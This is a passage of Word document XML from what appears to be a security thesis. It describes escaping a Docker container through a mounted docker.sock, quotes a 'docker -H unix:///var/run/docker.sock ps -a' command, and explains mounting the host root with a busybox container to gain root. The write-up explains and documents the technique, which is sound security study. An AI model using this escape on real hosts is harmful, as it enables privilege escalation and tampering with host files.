      <w:r w:rsidRPr="00C5787D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00C5787D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00C5787D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>44</w:t>
      </w:r>
      <w:r w:rsidRPr="00C5787D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00C5787D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00A60F52" w:rsidRPr="00C5787D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">launching </w:t>
      </w:r>
      <w:r w:rsidR="00EF26A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="00A60F52" w:rsidRPr="00C5787D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ocker </w:t>
      </w:r>
      <w:r w:rsidR="00EF26A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">container </w:t>
      </w:r>
      <w:r w:rsidR="00A60F52" w:rsidRPr="00C5787D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">mounted </w:t>
      </w:r>
      <w:r w:rsidR="00C5787D" w:rsidRPr="00C5787D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>to the Docker daemon.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="122"/>
    </w:p>
    <w:p w14:paraId="0CF18BF4" w14:textId="2136E701" w:rsidR="00F17DD5" w:rsidRPr="0026469A" w:rsidRDefault="008B50DF" w:rsidP="00F17DD5">
      <w:r>
        <w:t xml:space="preserve">By default, Docker </w:t>
      </w:r>
      <w:r w:rsidR="00794DB3">
        <w:t>daemon listens</w:t>
      </w:r>
      <w:r w:rsidR="00BF0895">
        <w:t xml:space="preserve"> to</w:t>
      </w:r>
      <w:r w:rsidR="00794DB3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005044ED">
        <w:t xml:space="preserve">API calls </w:t>
      </w:r>
      <w:r w:rsidR="00794DB3">
        <w:t>on</w:t>
      </w:r>
      <w:r w:rsidR="005044ED">
        <w:t xml:space="preserve"> /var/run/docker.sock</w:t>
      </w:r>
      <w:r w:rsidR="002A5D28">
        <w:t xml:space="preserve"> Unix socket.</w:t>
      </w:r>
      <w:r w:rsidR="00C147B8">
        <w:t xml:space="preserve"> Also</w:t>
      </w:r>
      <w:r w:rsidR="00AD31CE">
        <w:t xml:space="preserve">, containers communicate with the Docker daemon </w:t>
      </w:r>
      <w:r w:rsidR="00EF7907">
        <w:t xml:space="preserve">through this Unix socket, and thus the attacker can </w:t>
      </w:r>
      <w:r w:rsidR="00AB09BC">
        <w:t>access the host system and bypass one level</w:t>
      </w:r>
      <w:r w:rsidR="004E4264">
        <w:t>, as shown in figure 45.</w:t>
      </w:r>
      <w:r w:rsidR="0090302F">
        <w:t xml:space="preserve"> The </w:t>
      </w:r>
      <w:r w:rsidR="0090302F" w:rsidRPr="0090302F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>docker -H unix:///var/run/docker.sock ps -a</w:t>
      </w:r>
      <w:r w:rsidR="0090302F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> command </w:t>
      </w:r>
      <w:r w:rsidR="0026469A">
        <w:t xml:space="preserve">enabled the attacker to </w:t>
      </w:r>
      <w:r w:rsidR="00BC0E2F">
        <w:t xml:space="preserve">access the host shell and </w:t>
      </w:r>
      <w:r w:rsidR="00BC32F3">
        <w:t>identify other containers running on the Docker host.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ECEB405" w14:textId="47149FBB" w:rsidR="006A2BBE" w:rsidRDefault="006A2BBE" w:rsidP="006A2BBE">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="725ADD48" wp14:editId="520A9928">
            <wp:extent cx="5403850" cy="6322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3850" cy="632225"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D40944F" w14:textId="41208BFB" w:rsidR="002128E6" w:rsidRPr="00FD330A" w:rsidRDefault="002128E6" w:rsidP="00FD330A">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="123" w:name="_Toc86858636"/>
      <w:r w:rsidRPr="00FD330A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD330A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00FD330A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00FD330A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>45</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD330A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00FD330A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00FD330A" w:rsidRPr="00FD330A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> identifying things on the host system.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="123"/>
    </w:p>
    <w:p w14:paraId="179DE611" w14:textId="16057357" w:rsidR="005922DC" w:rsidRDefault="007F2922" w:rsidP="005922DC">
      <w:r>
        <w:t xml:space="preserve">At this stage, the attacker can also see what images are running on the </w:t>
      </w:r>
      <w:r w:rsidR="005F3F61">
        <w:t>Docker host.</w:t>
      </w:r>
      <w:r w:rsidR="009C6A6A">
        <w:t xml:space="preserve"> The output in figure 46 shows </w:t>
      </w:r>
      <w:r w:rsidR="00F107DD">
        <w:t xml:space="preserve">all the Docker images </w:t>
      </w:r>
      <w:r w:rsidR="00CF30E6">
        <w:t>on the host system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356C8489" w14:textId="116B70B0" w:rsidR="00005A93" w:rsidRDefault="00005A93" w:rsidP="00005A93">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41002413" wp14:editId="4DF6C2BF">
            <wp:extent cx="4845050" cy="1674779"/>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45050" cy="1674779"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="61CED7B8" w14:textId="1E08CF87" w:rsidR="00033ED7" w:rsidRDefault="005871E1" w:rsidP="000924C7">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="124" w:name="_Toc86858637"/>
      <w:r w:rsidRPr="000924C7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="000924C7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="000924C7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="000924C7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>46</w:t>
      </w:r>
      <w:r w:rsidRPr="000924C7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="000924C7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="000924C7" w:rsidRPr="000924C7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Docker images on the host.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="124"/>
    </w:p>
    <w:p w14:paraId="302E38B8" w14:textId="4A1F8471" w:rsidR="000924C7" w:rsidRDefault="008737F7" w:rsidP="000924C7">
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="009A7E23">
        <w:t xml:space="preserve">he attacker can </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">also </w:t>
      </w:r>
      <w:r w:rsidR="00000894">
        <w:t xml:space="preserve">run another </w:t>
      </w:r>
      <w:r>
        <w:t>intera</w:t>
      </w:r>
      <w:r w:rsidR="008A3E3B">
        <w:t xml:space="preserve">ctive </w:t>
      </w:r>
      <w:r w:rsidR="00000894">
        <w:t xml:space="preserve">container inside the </w:t>
      </w:r>
      <w:r>
        <w:t>container to</w:t>
      </w:r>
      <w:r w:rsidR="008A3E3B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009D60C3">
        <w:t>further</w:t>
      </w:r>
      <w:r w:rsidR="001D47CD">
        <w:t xml:space="preserve"> exploit the host system.</w:t>
      </w:r>
      <w:r w:rsidR="004C1527">
        <w:t xml:space="preserve"> In such a case,</w:t>
      </w:r>
      <w:r w:rsidR="00950F76">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005F6109">
        <w:t xml:space="preserve">a Linux </w:t>
      </w:r>
      <w:r w:rsidR="00ED4D59">
        <w:t xml:space="preserve">distro busybox </w:t>
      </w:r>
      <w:r w:rsidR="00A64E77">
        <w:t xml:space="preserve">Docker </w:t>
      </w:r>
      <w:r w:rsidR="00ED4D59">
        <w:t xml:space="preserve">image is used to create a container </w:t>
      </w:r>
      <w:r w:rsidR="00B76A4C">
        <w:t>that</w:t>
      </w:r>
      <w:r w:rsidR="00A64E77">
        <w:t xml:space="preserve"> provides shell access</w:t>
      </w:r>
      <w:r w:rsidR="00B76A4C">
        <w:t xml:space="preserve"> and mounts the root to the </w:t>
      </w:r>
      <w:r w:rsidR="009E7C85">
        <w:t xml:space="preserve">host </w:t>
      </w:r>
      <w:r w:rsidR="00EC7C20">
        <w:t>filesystem on the host</w:t>
      </w:r>
      <w:r w:rsidR="00A64E77">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00EC7C20">
        <w:t xml:space="preserve"> The commands used to create such </w:t>
      </w:r>
      <w:r w:rsidR="00AF41BC">
        <w:t xml:space="preserve">a container </w:t>
      </w:r>
      <w:r w:rsidR="00E70923">
        <w:t>are presented in figure 47.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA809F0" w14:textId="627D9707" w:rsidR="00E140FD" w:rsidRDefault="00E140FD" w:rsidP="00E140FD">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="115D710A" wp14:editId="5616E877">
            <wp:extent cx="4133850" cy="5842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33850" cy="584200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0717C4D5" w14:textId="1E0AA112" w:rsidR="00E70923" w:rsidRDefault="00E70923" w:rsidP="005056AE">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="125" w:name="_Toc86858638"/>
      <w:r w:rsidRPr="005056AE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="005056AE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="005056AE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="005056AE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>47</w:t>
      </w:r>
      <w:r w:rsidRPr="005056AE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="005056AE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="0020719A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="005056AE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>reating busybox container</w:t>
      </w:r>
      <w:r w:rsidR="005056AE" w:rsidRPr="005056AE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="125"/>
    </w:p>
    <w:p w14:paraId="4E2207ED" w14:textId="24A2D838" w:rsidR="009A3FE0" w:rsidRPr="009A3FE0" w:rsidRDefault="009E3129" w:rsidP="009A3FE0">
      <w:r>
        <w:t xml:space="preserve">The author leveraged the above container to </w:t>
      </w:r>
      <w:r w:rsidR="000055F4">
        <w:t>explore and exploit the host system, as show</w:t>
      </w:r>
      <w:r w:rsidR="00DF1549">
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidR="000055F4">
        <w:t xml:space="preserve"> in</w:t>
      </w:r>
      <w:r w:rsidR="00A960CA">
        <w:t xml:space="preserve"> figure 48.</w:t>
      </w:r>
      <w:r w:rsidR="00B25F03">
        <w:t xml:space="preserve"> The </w:t>
      </w:r>
      <w:r w:rsidR="00C22BC7">
        <w:t>attacker has root privilege a</w:t>
      </w:r>
      <w:r w:rsidR="00DF111D">
        <w:t>nd thus can modify</w:t>
      </w:r>
      <w:r w:rsidR="005F4B14">
        <w:t>, delete, and create files on the host machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2177C992" w14:textId="4BBD9DA9" w:rsidR="00283713" w:rsidRDefault="00C16B0E" w:rsidP="00EA36C8">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45334728" wp14:editId="392E5319">
            <wp:extent cx="5149850" cy="1176542"/>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49850" cy="1176542"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="44562D8B" w14:textId="5D052646" w:rsidR="00645471" w:rsidRDefault="00645471" w:rsidP="00F52A51">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="126" w:name="_Toc86858639"/>
      <w:r w:rsidRPr="00F52A51">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00F52A51">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00F52A51">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00F52A51">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>48</w:t>
      </w:r>
      <w:r w:rsidRPr="00F52A51">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00F52A51">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="0020719A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidR="00F52A51" w:rsidRPr="00F52A51">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">xploring the </w:t>
      </w:r>
      <w:r w:rsidR="00386AE4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Docker </w:t>
      </w:r>
      <w:r w:rsidR="00F52A51" w:rsidRPr="00F52A51">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>host directories.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="126"/>
    </w:p>
    <w:p w14:paraId="6CBAFDAE" w14:textId="56B392A8" w:rsidR="00F52A51" w:rsidRDefault="003F4F4A" w:rsidP="003F4F4A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="127" w:name="_Toc86859299"/>
      <w:r>
        <w:t>Vulnerable Application</w:t>
      </w:r>
      <w:bookmarkEnd w:id="127"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
